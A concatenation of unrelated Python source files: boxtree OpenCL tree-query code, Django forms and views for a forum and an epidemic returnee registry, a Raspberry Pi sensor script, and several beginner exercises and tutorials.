@memoize_method
def get_space_invader_query_kernel(self, dimensions, coord_dtype,
box_id_dtype, peer_list_idx_dtype, max_levels):
return SPACE_INVADER_QUERY_TEMPLATE.generate(
self.context,
dimensions,
coord_dtype,
box_id_dtype,
peer_list_idx_dtype,
max_levels)
# }}}
def __call__(self, queue, tree, ball_centers, ball_radii, peer_lists=None,
wait_for=None):
"""
:arg queue: a :class:`pyopencl.CommandQueue`
:arg tree: a :class:`boxtree.Tree`.
:arg ball_centers: an object array of coordinate
:class:`pyopencl.array.Array` instances.
Their *dtype* must match *tree*'s
:attr:`boxtree.Tree.coord_dtype`.
:arg ball_radii: a
:class:`pyopencl.array.Array`
of positive numbers.
Its *dtype* must match *tree*'s
:attr:`boxtree.Tree.coord_dtype`.
:arg peer_lists: may either be *None* or an instance of
:class:`PeerListLookup` associated with `tree`.
:arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
instances for whose completion this command waits before starting
execution.
:returns: a tuple *(sqi, event)*, where *sqi* is an instance of
:class:`pyopencl.array.Array`, and *event* is a :class:`pyopencl.Event`
for dependency management. The *dtype* of *sqi* is
*tree*'s :attr:`boxtree.Tree.coord_dtype` and its shape is
*(tree.nboxes,)* (see :attr:`boxtree.Tree.nboxes`).
The entries of *sqi* are indexed by the global box index and are
as follows:
* if *i* is not the index of a leaf box, *sqi[i] = 0*.
* if *i* is the index of a leaf box, *sqi[i]* is the
outer space invader distance for *i*.
"""
from pytools import single_valued
if single_valued(bc.dtype for bc in ball_centers) != tree.coord_dtype:
raise TypeError("ball_centers dtype must match tree.coord_dtype")
if ball_radii.dtype != tree.coord_dtype:
raise TypeError("ball_radii dtype must match tree.coord_dtype")
from pytools import div_ceil
# Avoid generating too many kernels.
max_levels = div_ceil(tree.nlevels, 10) * 10
if peer_lists is None:
peer_lists, evt = self.peer_list_finder(queue, tree, wait_for=wait_for)
wait_for = [evt]
if len(peer_lists.peer_list_starts) != tree.nboxes + 1:
raise ValueError("size of peer lists must match with number of boxes")
space_invader_query_kernel = self.get_space_invader_query_kernel(
tree.dimensions, tree.coord_dtype, tree.box_id_dtype,
peer_lists.peer_list_starts.dtype, max_levels)
si_plog = ProcessLogger(logger, "space invader query")
outer_space_invader_dists = cl.array.zeros(queue, tree.nboxes, np.float32)
if not wait_for:
wait_for = []
wait_for = (wait_for
+ outer_space_invader_dists.events
+ ball_radii.events
+ [evt for bc in ball_centers for evt in bc.events])
evt = space_invader_query_kernel(
*SPACE_INVADER_QUERY_TEMPLATE.unwrap_args(
tree, peer_lists,
ball_radii,
outer_space_invader_dists,
*tuple(bc for bc in ball_centers)),
wait_for=wait_for,
queue=queue,
range=slice(len(ball_radii)))
if tree.coord_dtype != np.dtype(np.float32):
# The kernel output is always an array of float32 due to limited
# support for atomic operations with float64 in OpenCL.
# Here the output is cast to match the coord dtype.
outer_space_invader_dists.finish()
outer_space_invader_dists = outer_space_invader_dists.astype(
tree.coord_dtype)
evt, = outer_space_invader_dists.events
si_plog.done()
return outer_space_invader_dists, evt
# }}}
# {{{ peer list build
class PeerListFinder:
"""This class builds a look-up table from box numbers to peer boxes. The
full definition [1]_ of a peer box is as follows:
Given a box :math:`b_j` in a quad-tree, :math:`b_k` is a peer box of
:math:`b_j` if it is
1. adjacent to :math:`b_j`,
2. of at least the same size as :math:`b_j` (i.e. at the same or a
higher level than), and
3. no child of :math:`b_k` satisfies the above two criteria.
.. [1] Rachh, Manas, Andreas Klöckner, and Michael O'Neil. "Fast
algorithms for Quadrature by Expansion I: Globally valid expansions."
.. versionadded:: 2016.1
.. automethod:: __init__
.. automethod:: __call__
"""
def __init__(self, context):
self.context = context
# {{{ Kernel generation
@memoize_method
def get_peer_list_finder_kernel(self, dimensions, coord_dtype,
box_id_dtype, max_levels):
from pyopencl.tools import dtype_to_ctype
from boxtree import box_flags_enum
logger.debug("start building peer list finder kernel")
from boxtree.traversal import (
HELPER_FUNCTION_TEMPLATE, TRAVERSAL_PREAMBLE_TEMPLATE)
template = Template(
TRAVERSAL_PREAMBLE_TEMPLATE
+ HELPER_FUNCTION_TEMPLATE
+ PEER_LIST_FINDER_TEMPLATE,
strict_undefined=True)
render_vars = {
"np": np,
"dimensions": dimensions,
"dtype_to_ctype": dtype_to_ctype,
"box_id_dtype": box_id_dtype,
"particle_id_dtype": None,
"coord_dtype": coord_dtype,
"get_coord_vec_dtype": get_coord_vec_dtype,
"cvec_sub": partial(coord_vec_subscript_code, dimensions),
"max_levels": max_levels,
"AXIS_NAMES": AXIS_NAMES,
"box_flags_enum": box_flags_enum,
"debug": False,
# For calls to the helper is_adjacent_or_overlapping()
"targets_have_extent": False,
"sources_have_extent": False,
}
from boxtree.tools import ScalarArg, VectorArg
arg_decls = [
VectorArg(coord_dtype, "box_centers", with_offset=False),
ScalarArg(coord_dtype, "root_extent"),
VectorArg(np.uint8, "box_levels"),
ScalarArg(box_id_dtype, "aligned_nboxes"),
VectorArg(box_id_dtype, "box_child_ids", with_offset=False),
VectorArg(box_flags_enum.dtype, "box_flags"),
]
from pyopencl.algorithm import ListOfListsBuilder
peer_list_finder_kernel = ListOfListsBuilder(
self.context,
[("peers", box_id_dtype)],
str(template.render(**render_vars)),
arg_decls=arg_decls,
name_prefix="find_peer_lists",
count_sharing={},
complex_kernel=True)
logger.debug("done building peer list finder kernel")
return peer_list_finder_kernel
# }}}
def __call__(self, queue, tree, wait_for=None):
"""
:arg queue: a :class:`pyopencl.CommandQueue`
:arg tree: a :class:`boxtree.Tree`.
:arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
instances for whose completion this command waits before starting
execution.
:returns: a tuple *(pl, event)*, where *pl* is an instance of
:class:`PeerListLookup`, and *event* is a :class:`pyopencl.Event`
for dependency management.
"""
from pytools import div_ceil
# Round up level count--this gets included in the kernel as
# a stack bound. Rounding avoids too many kernel versions.
max_levels = div_ceil(tree.nlevels, 10) * 10
peer_list_finder_kernel = self.get_peer_list_finder_kernel(
tree.dimensions, tree.coord_dtype, tree.box_id_dtype, max_levels)
pl_plog = ProcessLogger(logger, "find peer lists")
result, evt = peer_list_finder_kernel(
queue, tree.nboxes,
tree.box_centers.data, tree.root_extent,
tree.box_levels, tree.aligned_nboxes,
tree.box_child_ids.data, tree.box_flags,
wait_for=wait_for)
pl_plog.done()
return PeerListLookup(
tree=tree,
peer_list_starts=result["peers"].starts,
peer_lists=result["peers"].lists).with_queue(None), evt
# }}}
# vim: fdm=marker
|
from django.urls import path
from Personas.api.views.person_views import *
urlpatterns = [
path("create-person/", CreatePerson.as_view(), name='create-person'),
path("get-legal-entity/", GetLegalEntity.as_view(), name='get-legal-entity'),
path("get-natural-person/", GetNaturalPerson.as_view(), name='get-natural-person'),
path("complete-data/", CompleteData.as_view(), name='complete-data'),
path("retrieve-address/", RetrieveAddress.as_view(), name='retrieve-address'),
path("list-by-initial/", ListByInitial.as_view(), name='list-by-initial'),
] |
from config.base_config import BaseConfig
class SqlConfig(BaseConfig):
def __init__(self):
super().__init__()
self.file = 'sql.ini'
|
import RPi.GPIO as GPIO
import time
glue_sensor = 9
stamp_sensor = 19
buzzer = 19
GPIO.setmode(GPIO.BCM)
GPIO.setup(glue_sensor,GPIO.IN)
GPIO.setup(stamp_sensor,GPIO.IN)
GPIO.setup(buzzer,GPIO.OUT)
GPIO.output(buzzer,False)
print("IR Sensors are Ready.....")
print(" ")
try:
while True:
if GPIO.input(glue_sensor):
GPIO.output(buzzer,False)
print("Glue_Sensor Object not Detected")
time.sleep(0.003)
elif GPIO.input(glue_sensor)==False:
GPIO.output(buzzer,True)
print("Glue_Sensor Object Detected ")
time.sleep(0.003)
# if GPIO.input(stamp_sensor):
# GPIO.output(buzzer,False)
# print("Stamp_Sensor Object not Detected")
# time.sleep(0.003)
# elif GPIO.input(stamp_sensor)==False:
# GPIO.output(buzzer,True)
# print("Stamp_Sensor Object Detected")
# time.sleep(0.003)
except KeyboardInterrupt:
GPIO.cleanup()
|
def UltimaSifra(x):
xs="{0}".format(x)
Tamaño = len(xs)
print (Tamaño)
def rotar(xs=[]):
Pr=xs[0]
xs.pop(0)
xs.append(Pr)
return xs
def rotarN(n,xs=[]):
for i in range(0,n):
Pr=xs[0]
xs.pop(0)
xs.append(Pr)
return xs
def Rango(xs=[]):
xs.append(min(xs))
xs.append(max(xs))
return xs
def Polinomio(xs=[]):
xs=[]
if(len(xs)%2)==0:
return False
else:
return True
def TResIguales(x,y,z):
if x==y:
if y==z:
return True
else:
return False
else:
return False
|
import re
txt="""
abcd
bfcd
352-980-879
123.436.908
675*576*894
800-980-879
900-980-879
Mr.Dragon
Mr.Cheetah
Mr. Tiger
Mr L
Ms.Divya
Mrs Savithri
arunbond30@skype.com
arunbond30@skype*com
arun.s.kumar@techmahindra.com
arun&43@example.com
arun.teacher@cap.org
http://www.google.com
https://www.msn.com
http://youtube.org
"""
#ptrn=re.compile(r'\d{3}[-]\d{3}[-]\d{3}')
#ptrn=re.compile(r'Mr\.?\s?[a-zA-Z]\w*')
# ptrn=re.compile(r'M(r|s|rs)\.?\s?[a-zA-Z]\w*') #This is called groups()
#ptrn=re.compile(r'(Mr|Ms|Mrs)\.?\s?[a-zA-Z]\w*') # The above one and this both are same
# ptrn=re.compile(r'[a-zA-Z][a-zA-Z0-9-.]+@[a-zA-Z]+\.(in|com)') # To match the mail ID's
#ptrn=re.compile(r'https?://(www\.)?[a-zA-Z]+\.[a-zA-Z]{2,10}') # To match the websites.
ptrn=re.compile(r'https?://(www\.)?(\w+)\.(\w+)') #To match the websites by Corey Schafer using word character.
matches=ptrn.finditer(txt)
##########################################################################
# Using Quantifiers to Match more than one Character.
# Qunatifiers:
# letter . is called as a Period, \. Period escaped with the backslash
##########################################################################
# * - 0 or more
# + - 1 or more
# ? - 0 or One - This symbol is used for optional use, we may need or may not need that character
# {3} - Exact number
# {3,5} - Range of numbers(minimum, maximum)
##########################################################################
L1=[]
for match in matches:
L1.append(match.group(1)) # Group(0) is entire match, group(1) is www, 2 is domain name, 3 is top level domain names
print(L1)
######################### Groups ##########################
# () -> Groups allow us to match several other patterns |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
def solveIt():
"Return a string that is the screen name you would like."
return 'wkschwartz'
if __name__ == '__main__':
print('This script submits the screen name:', solveIt())
|
'''
Created on 14 nov. 2012
@author: naamane.othmane
'''
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
from my_forum.models import Thread,Post
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, HTML
from crispy_forms.bootstrap import FormActions
from django.template.defaultfilters import slugify
# I put this on all required fields, because it's easier to pick up
# on them with CSS or JavaScript if they have a class of "required"
# in the HTML. Your mileage may vary. If/when Django ticket #3515
# lands in trunk, this will no longer be necessary.
attrs_dict = {'class': 'required'}
class RegistrationForm(forms.Form):
"""
"""
last_name = forms.RegexField(regex=r'^[a-zA-Z]+$',
max_length=20,
widget=forms.TextInput(attrs=attrs_dict),
label=_("Last name"),
error_messages={'invalid': _(u"Only caracters are accepted.")})
first_name = forms.RegexField(regex=r'^[a-zA-Z]+$',
max_length=20,
widget=forms.TextInput(attrs=attrs_dict),
label=_("First name"),
error_messages={'invalid': _(u"Only caracters are accepted.")})
username = forms.RegexField(regex=r'^[a-zA-Z]+$',
max_length=30,
widget=forms.TextInput(attrs=attrs_dict),
label=_("Username"),
error_messages={'invalid': _(u"Only caracters are accepted.")})
email = forms.EmailField(widget=forms.TextInput(attrs=dict(attrs_dict,
maxlength=75)),
label=_("E-mail"))
password = forms.CharField(widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
min_length = 8,
error_messages={'invalid': _(u"Minimum 8 caracters.")},
label=_("Password"))
tos = forms.BooleanField(widget=forms.CheckboxInput(attrs=attrs_dict),
label=_(u"I agree to the Forum Terms of Service and Privacy Policy."),
error_messages={ 'required': _(u"You must accept Forum's Terms of Service and Privacy Policy")})
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
self.helper.form_id = 'id_registration'
self.helper.form_method = 'post'
self.helper.form_action = '.'
self.helper.form_class = "form-horizontal"
self.helper.error_text_inline = True
self.helper.layout = Layout(
'username',
'password',
'email',
'last_name',
'first_name',
'tos',
FormActions(
Submit('submit', 'Send', css_class="btn-primary"),
HTML('<a class="btn" href="/">Cancel</a>')
)
)
super(RegistrationForm, self).__init__(*args, **kwargs)
def clean_email(self):
"""
Validate that the supplied email address is unique for the
site.
"""
if User.objects.filter(email__iexact=self.cleaned_data['email']):
raise forms.ValidationError(_("This email address is already in use. Please supply a different email address."))
return self.cleaned_data['email']
def clean_username(self):
"""
Validate that the username is alphanumeric and is not already
in use.
"""
existing = User.objects.filter(username__iexact=self.cleaned_data['username'])
if existing.exists():
raise forms.ValidationError(_("A user with that username already exists."))
else:
return self.cleaned_data['username']
class ThreadForm(forms.Form):
thread_title = forms.CharField(max_length=40,
widget=forms.TextInput(attrs=attrs_dict),
label=_("Thread title"))
post_title = forms.CharField(max_length=40,
widget=forms.TextInput(attrs=attrs_dict),
label=_("Post Title"))
post_description = forms.CharField(max_length=4000,
widget=forms.Textarea(attrs=attrs_dict),
label=_("Description"))
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
self.helper.form_id = 'id_new_thread'
self.helper.form_method = 'post'
self.helper.form_action = '.'
self.helper.form_class = "form-horizontal"
self.helper.error_text_inline = True
self.helper.layout = Layout(
'thread_title',
'post_title',
'post_description',
FormActions(
Submit('submit', 'Send', css_class="btn-primary"),
HTML('<a class="btn" href="/">Cancel</a>')
)
)
super(ThreadForm, self).__init__(*args, **kwargs)
def clean_thread_title(self):
"""
Validate that the username is alphanumeric and is not already
in use.
"""
existing = Thread.objects.filter(slug__iexact=slugify(self.cleaned_data['thread_title']))
if existing.exists():
raise forms.ValidationError(_("Thread already exist."))
else:
return self.cleaned_data['thread_title']
class PostForm(forms.Form):
post_id = forms.CharField(widget=forms.HiddenInput(attrs={'value':'2'}))
thread_nom = forms.CharField(widget=forms.HiddenInput(attrs={'value':'2'}))
post_description = forms.CharField(max_length=4000,
widget=forms.Textarea(attrs=attrs_dict),
label=_("Post"))
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
self.helper.form_id = ''
self.helper.form_method = 'post'
self.helper.form_action = '.'
self.helper.form_class = "form-inline"
self.helper.error_text_inline = True
self.helper.layout = Layout('post_description','post_id','thread_nom',
FormActions(
Submit("btn-add-post", "Add Post", css_class="btn-primary")
)
)
super(PostForm, self).__init__(*args, **kwargs)
|
from sys import stdin
def pairSum0(l,n):
# Write your code here
d = {}
for i in l:
d[i] = d.get(i,0) + 1
count = 0
for j in d:
if j == 0:
k = d[j]
count = count+(k*(k-1)//2)
else:
if -j in d:
p = d[j]
q = d[-j]
count = count + (p*q)
d[j] = 0
d[-j] = 0
return count
def takeInput():
#To take fast I/O
n=int(stdin.readline().strip())
if n==0:
return list(),0
arr=list(map(int,stdin.readline().strip().split( )))
return arr,n
arr,n=takeInput()
print(pairSum0(arr,n))
|
from pprint import pprint
from pymongo import MongoClient
from urllib.parse import quote_plus
import datetime
isinpackage = not __name__ in ['db', '__main__']
if isinpackage:
from .log import log
from .settings import settings
else:
from settings import settings
def log(module, msg):
print(module, msg)
db = None
def init(url):
if settings.mongod():
url_ = url.replace("{username}", quote_plus(settings.mongod.username())).replace("{password}", quote_plus(settings.mongod.password()))
else:
url_ = url
client = MongoClient(url_)
global db
db = client.kyukou
log(__name__, f'Connected to DB: "{url}"')
log(__name__, '-'*50)
log(__name__, f'Number of Users : {len(list(get_collection("users").find({})))}')
log(__name__, f'Number of Lectures: {len(list(get_collection("lectures").find({})))}')
log(__name__, f'Number of Syllabus: {len(list(get_collection("syllabus").find({})))}')
log(__name__, f'Number of Queue : {len(list(get_collection("queue").find({})))}')
log(__name__, '-'*50)
def get_collection(name):
return db[name]
if not isinpackage:
from settings import settings
init(settings.mongo_url())
__all__ = ["init", "get_collection"]
|
s=input()
res=[0]*len(s)
begin=0
s=list(s)
n=len(s)
index=0
while begin<n:
index=begin+s[begin:].index('L')
if index!=len(s)-1 and s[index+1]=='R':
if (index-begin+1)%2==0:
res[index]=(index-begin+1)//2
res[index-1]=(index-begin+1)//2
else:
res[index]=index-begin
res[index-1]=index-begin-1
elif index==len(s)-1:
if (index-begin+1)%2==0:
res[index]=(index-begin+1)//2
res[index-1]=(index-begin+1)//2
else:
res[index]=(index-begin+1)//2+1
res[index-1]=(index-begin+1)//2
break
elif index!=len(s)-1 and s[index+1]=='L':
if 'R' in s[index+1:]:
tmp=s[index+1:].index('R')
res[index]+=tmp-index-1
if (index-begin+1)%2==0:
res[index]+=(index-begin+1)//2
res[index-1]+=(index-begin+1)//2
else:
res[index]+=index-begin
res[index-1]+=index-begin-1
index=tmp-1
else:
res[index]+=n-index-1
if (index-begin+1)%2==0:
res[index]+=(index-begin+1)//2
res[index-1]+=(index-begin+1)//2
else:
res[index]+=index-begin
res[index-1]+=index-begin-1
break
begin=index+1
for i in res:
print(i,end=' ') |
# coding=utf-8
import json
# 列表,相当于java的数组
# 最长应用场景:存储相同类型的数据,然后通过迭代遍历,再循环体内部,
# 针对列表中的每一项元素,执行相同的操作
name_list = ["zhangsan", "lisi", "wangwu"]
print (name_list)
# 通过索引取出列表中的数据,以索引从0开始
print (name_list[1])
# 1.取值和取索引,且注意不要超出索引范围
print (name_list[0])
# 根据列表中的内容取索引值,但是如果输入的内容列表中没有会报错
print (name_list.index("lisi"))
# 2.修改
name_list[1] = "wangermazi"
# 3.增加,append可以向列表的末尾追加数据
name_list.append("wangxiaoer")
# 3.1 insert方法可以在索引2的指定位置插入数据
name_list.insert(1, "张三")
print json.dumps(name_list, encoding="UTF-8", ensure_ascii=False, sort_keys=False, indent=4)
# 4.删除列表中的元素
# 删除指定元素
name_list.remove("张三")
# 删除列表中最后的元素或指定元素
name_list.pop()
name_list.pop(0)
# clear方法可以清空列表2.7没有clear方法
# 5.del关键字,同样可以删除指定元素
del name_list[1]
# del关键字本质上是用来将一个变量从内存中删除的
nam = "小明"
del nam
# 注意,如果使用del关键字将变量从内存中删除
# 后续的代码就不能再使用这个变量了
# 6.count关键字,可以统计列表中某一个数据出现的次数
count = name_list.count("张三")
print ("张三出现了%d次" % count)
# 7.sort排序,三个参数:默认升序
name_list.sort()
# 降序
name_list.sort(reverse=True)
# 8.列表的遍历(for循环)
for my_name in name_list:
print ("我的名字叫%s" % my_name)
|
import os
import time, datetime
import xlrd
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.utils.http import urlquote
from django.views.decorators.csrf import csrf_protect
from django.core.paginator import Paginator
from yqry import settings
from .models import yqdx_fyz, yqdx_zzq_provinces, yqdx_zzq_city
import xlsxwriter
from django.http import FileResponse
from .query_helupingtai import *
from django.db.models import Count
# Create your views here.
###################返甬人员组######################################
def get_progress_message(request):
dt = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
if not request.session.get('progress_message'):
return HttpResponse(dt + ':session初始化')
else:
return HttpResponse(dt + ':' + request.session.get('progress_message'))
def dx_import_fyz(request):
return render(request, "import_fyz.html")
def tongbu(request):
session_id = request.POST.get('session_id')
request.session['progress_message'] = '读取中...'
request.session.save()
request.session.set_expiry(0) #浏览器关闭后,session失效
succ_count = 0
error_list = []
i = 1
back_dic = import_data(session_id, i)
if back_dic['code'] == 305:
return JsonResponse({"code": 305, "msg": "cookie值无效,请重新输入!", "error": "cookie值无效,请重新输入!"})
elif back_dic['code'] == 200 and back_dic['count'] > 0:
try:
while True:
insert_dic_list = list()
for dic in back_dic['dic_list']:
uuid = dic['uuid']
userName = dic['userName']
phone = dic['phone']
idCard = dic['idCard']
liveAddress = dic['liveAddress']
workAddress = dic['workAddress']
carNo = dic['carNo']
carType = dic['carType']
startAddress_provinces, startAddress_city, startAddress_county = dic['startAddress'].split(' ')
endAddress_city, endAddress_county, endAddress_town = dic['endAddress'].split(' ')
endArea = dic['endArea']
kakou = dic['kakou']
whyGo = dic['whyGo']
createTime = dic['createTime']
if not yqdx_fyz.objects.filter(uuid=uuid).exists():
insert_dic_list.append(yqdx_fyz(uuid=uuid, userName=userName, phone=phone, idCard=idCard,
liveAddress=liveAddress, workAddress=workAddress, carNo=carNo,
carType=carType, startAddress_provinces=startAddress_provinces,
startAddress_city=startAddress_city,
startAddress_county=startAddress_county,
endAddress_city=endAddress_city,
endAddress_county=endAddress_county,
endAddress_town=endAddress_town,
endArea=endArea, kakou=kakou, whyGo=whyGo,
createTime=createTime,
createDate=createTime.split(' ')[0]))
succ_count += 1
yqdx_fyz.objects.bulk_create(insert_dic_list)
request.session['progress_message'] = '已完成同步第{0}页'.format(i)
request.session.save()
i += 1
back_dic = import_data(session_id, i)
if back_dic['count'] == 0:
break
except Exception as e:
error_list.append('手机:{0},姓名:{1},身份证号:{2},错误:{3}'.format(phone, userName, idCard, repr(e)))
request.session['progress_message'] = '同步完成'
request.session.save()
return JsonResponse({"code": 200, "msg": "同步成功,新增{0}条!".format(succ_count), "error": error_list})
def yqdx_list_fyz(request):
# 搜索条件获取
phone_no = request.POST.get('phone_no')
name = request.POST.get('name')
sfzh = request.POST.get('sfzh')
carType = request.POST.get('carType')
startAddress_provinces = request.POST.get('startAddress_provinces')
startAddress_city = request.POST.get('startAddress_city')
endAddress_town = request.POST.get('endAddress_town')
createDate = request.POST.get('createDate')
now_page = request.GET['page']
size = request.GET['size']
data_list = yqdx_fyz.objects.order_by('-createTime')
if (phone_no is not None) and (phone_no != ''):
data_list = data_list.filter(phone=phone_no)
now_page = '1'
if (name is not None) and (name != ''):
data_list = data_list.filter(userName__contains=name)
now_page = '1'
if (sfzh is not None) and (sfzh != ''):
data_list = data_list.filter(idCard__contains=sfzh)
now_page = '1'
if (carType is not None) and (carType != '全部'):
data_list = data_list.filter(carType=carType)
now_page = '1'
if (startAddress_provinces is not None) and (startAddress_provinces != '全部'):
data_list = data_list.filter(startAddress_provinces=startAddress_provinces)
now_page = '1'
if (startAddress_city is not None) and (startAddress_city != '全部'):
data_list = data_list.filter(startAddress_city=startAddress_city)
now_page = '1'
if (endAddress_town is not None) and (endAddress_town != '全部'):
data_list = data_list.filter(endAddress_town=endAddress_town)
now_page = '1'
if (createDate is not None) and (createDate != '全部'):
data_list = data_list.filter(createDate=createDate)
now_page = '1'
search_cache = {'phone_no': phone_no, 'name': name, 'sfzh': sfzh, 'carType': carType,
'startAddress_provinces': startAddress_provinces, 'startAddress_city': startAddress_city,
'endAddress_town': endAddress_town, 'startAddress_city': startAddress_city,
'createDate': createDate}
if data_list.exists():
# 分页
paginator = Paginator(data_list, size)
total_page = paginator.num_pages
total_count = paginator.count
back_page = paginator.page(now_page)
has_pre = back_page.has_previous()
has_next = back_page.has_next()
next_num = total_page
pre_num = 1
if has_next:
next_num = back_page.next_page_number()
if has_pre:
pre_num = back_page.previous_page_number()
# 查询交通工具
carType_list = yqdx_fyz.objects.values('carType').distinct()
# 查询来自省
startAddress_provinces_list = yqdx_fyz.objects.values('startAddress_provinces').distinct()
# 查询来自市
startAddress_city_list = yqdx_fyz.objects.values('startAddress_city').distinct()
# 查询返回镇街道
endAddress_town_list = yqdx_fyz.objects.values('endAddress_town').distinct()
# 查询申报日期集
createDate_list = yqdx_fyz.objects.values('createDate').distinct().order_by('createDate')
return render(request, 'yqdx_list_fyz.html',
{'back_page': back_page, 'now_page': now_page, 'size': size, 'total_page': total_page,
'next_num': next_num,
'pre_num': pre_num, 'has_pre': has_pre, 'has_next': has_next,
'carType_list': carType_list, 'startAddress_provinces_list': startAddress_provinces_list,
'startAddress_city_list': startAddress_city_list, 'endAddress_town_list': endAddress_town_list,
'search_cache': search_cache, 'createDate_list': createDate_list,
'total_count': total_count})
else:
return HttpResponse(
"库里无数据,请先批量导入或修改查询条件<br><a href='/'>首页</a><br><a href='/yqdx_list_fyz?page=1&size=100'>返回列表</a>")
def yqdx_list_export_fyz(request):
phone_no = request.POST.get('phone_no')
name = request.POST.get('name')
sfzh = request.POST.get('sfzh')
carType = request.POST.get('carType')
startAddress_provinces = request.POST.get('startAddress_provinces')
startAddress_city = request.POST.get('startAddress_city')
endAddress_town = request.POST.get('endAddress_town')
createTime = request.POST.get('createTime')
# 获取当前时间的时间戳
timestr = str(time.time()).replace('.', '')
data_list_tmp = yqdx_fyz.objects.all()
if (phone_no is not None) and (phone_no != ''):
data_list_tmp = data_list_tmp.filter(phone=phone_no)
if (name is not None) and (name != ''):
data_list_tmp = data_list_tmp.filter(userName__contains=name)
if (sfzh is not None) and (sfzh != ''):
data_list_tmp = data_list_tmp.filter(idCard__contains=sfzh)
if (carType is not None) and (carType != '全部'):
data_list_tmp = data_list_tmp.filter(carType=carType)
if (startAddress_provinces is not None) and (startAddress_provinces != '全部'):
data_list_tmp = data_list_tmp.filter(startAddress_provinces=startAddress_provinces)
if (startAddress_city is not None) and (startAddress_city != '全部'):
data_list_tmp = data_list_tmp.filter(startAddress_city=startAddress_city)
if (endAddress_town is not None) and (endAddress_town != '全部'):
data_list_tmp = data_list_tmp.filter(endAddress_town=endAddress_town)
if (createTime is not None) and (createTime != '全部'):
data_list_tmp = data_list_tmp.filter(createTime=createTime)
# 创建结果导出文档
result_path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, 'export/', '{0}.xls'.format(timestr))
export_xls = xlsxwriter.Workbook(result_path) # 新建excel表
export_sheet = export_xls.add_worksheet('返甬预登记库查询导出')
# 写入第一行标题
export_sheet.write_row(0, 0, ['手机号', '姓名', '身份证号', '现住地址', '工作地址', '车牌/次号', '交通工具',
'来自省', '来自市', '来自县', '返回市', '返回区', '返回镇', '返回详址', '卡口', '返回理由', '登记日期', '数据来源'])
row_num = 1
for for_tmp in data_list_tmp:
query_set_list = [for_tmp.phone, for_tmp.userName, for_tmp.idCard, for_tmp.liveAddress, for_tmp.workAddress,
for_tmp.carNo,
for_tmp.carType, for_tmp.startAddress_provinces, for_tmp.startAddress_city,
for_tmp.startAddress_county, for_tmp.endAddress_city,
for_tmp.endAddress_county, for_tmp.endAddress_town, for_tmp.endArea, for_tmp.kakou,
for_tmp.whyGo,
for_tmp.createTime.strftime('%Y-%m-%d %H:%M'), for_tmp.from_source, ]
export_sheet.write_row(row_num, 0, query_set_list)
row_num += 1
# 循环完毕,开始写入
export_xls.close()
result = {"field": "export", "filename": timestr + '.xls'}
return JsonResponse(result)
def jjbd_fyz(request):
return render(request, "jjbd_fyz.html")
def jjbd_upload_fyz(request):
excel = request.FILES.get('excel')
bd_type = request.POST.get('bd_type')
# 获取文件类型
file_type = excel.name.rsplit('.')[-1]
file_type = file_type.lower()
# 获取当前时间的时间戳
timestr = str(time.time()).replace('.', '')
# 获取程序需要写入的文件路径
path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, '{0}.{1}'.format(timestr, file_type))
# 根据路径打开指定的文件(以二进制读写方式打开)
f = open(path, 'wb+')
# chunks将对应的文件数据转换成若干片段, 分段写入, 可以有效提高文件的写入速度, 适用于2.5M以上的文件
for chunk in excel.chunks():
f.write(chunk)
f.close()
# 创建比对结果导出文档
result_path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, 'jjbd/', '{0}.xls'.format(timestr))
jjbd_result_xls = xlsxwriter.Workbook(result_path) # 新建excel表
same_sheet = jjbd_result_xls.add_worksheet('相同结果集')
different_sheet = jjbd_result_xls.add_worksheet('不同结果集')
same_sheet_row_num = 0
different_sheet_row_num = 0
# 开始导入excel模板
book = xlrd.open_workbook(path)
sheet1 = book.sheets()[0]
row_num = sheet1.nrows
for n in range(0, row_num):
cell_0_value = sheet1.cell_value(n, 0)
if sheet1.cell(n, 0).ctype == 2:
cell_0_value = str(int(cell_0_value))
cell_0_value = cell_0_value.strip()
cell_1_value = sheet1.cell_value(n, 1)
if sheet1.cell(n, 1).ctype == 2:
cell_1_value = str(int(cell_1_value))
cell_1_value = cell_1_value.strip()
kwargs = {
# 动态查询的字段
}
if bd_type == '1' and cell_0_value != '': # 手机号
kwargs['phone'] = cell_0_value
elif bd_type == '2' and cell_0_value != '': # 身份证号
kwargs['idCard'] = cell_0_value
elif bd_type == '3' and cell_1_value != '': # 手机第一列,姓名第二列
kwargs['phone'] = cell_0_value
kwargs['userName'] = cell_1_value
elif bd_type == '4':
pass
if kwargs and yqdx_fyz.objects.filter(**kwargs).exists():
same_sheet.write_row(same_sheet_row_num, 0, sheet1.row_values(n))
same_sheet_row_num += 1
else:
different_sheet.write_row(different_sheet_row_num, 0, sheet1.row_values(n))
different_sheet_row_num += 1
jjbd_result_xls.close()
file_tmp = open(result_path, 'rb')
response = FileResponse(file_tmp)
response['Content-Type'] = 'application/vnd.ms-excel'
response['Content-Disposition'] = 'attachment;filename=' + urlquote(
'比对结果' + timestr + '.xls') # 返回下载文件的名称(activity.xls)
return response
def bddc_fyz(request):
return render(request, "bddc_fyz.html")
def bddc_upload_fyz(request):
excel = request.FILES.get('excel')
bd_type = request.POST.get('bd_type')
# 获取文件类型
file_type = excel.name.rsplit('.')[-1]
file_type = file_type.lower()
# 获取当前时间的时间戳
timestr = str(time.time()).replace('.', '')
file_name = '{0}.{1}'.format(timestr, file_type)
# 获取程序需要写入的文件路径
path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, file_name)
# 根据路径打开指定的文件(以二进制读写方式打开)
f = open(path, 'wb+')
# chunks将对应的文件数据转换成若干片段, 分段写入, 可以有效提高文件的写入速度, 适用于2.5M以上的文件
for chunk in excel.chunks():
f.write(chunk)
f.close()
# 创建比对结果导出文档
result_path = os.path.join(settings.BASE_DIR + settings.MEDIA_URL, 'bddc/', '{0}.xls'.format(timestr))
bddc_result_xls = xlsxwriter.Workbook(result_path) # 新建excel表
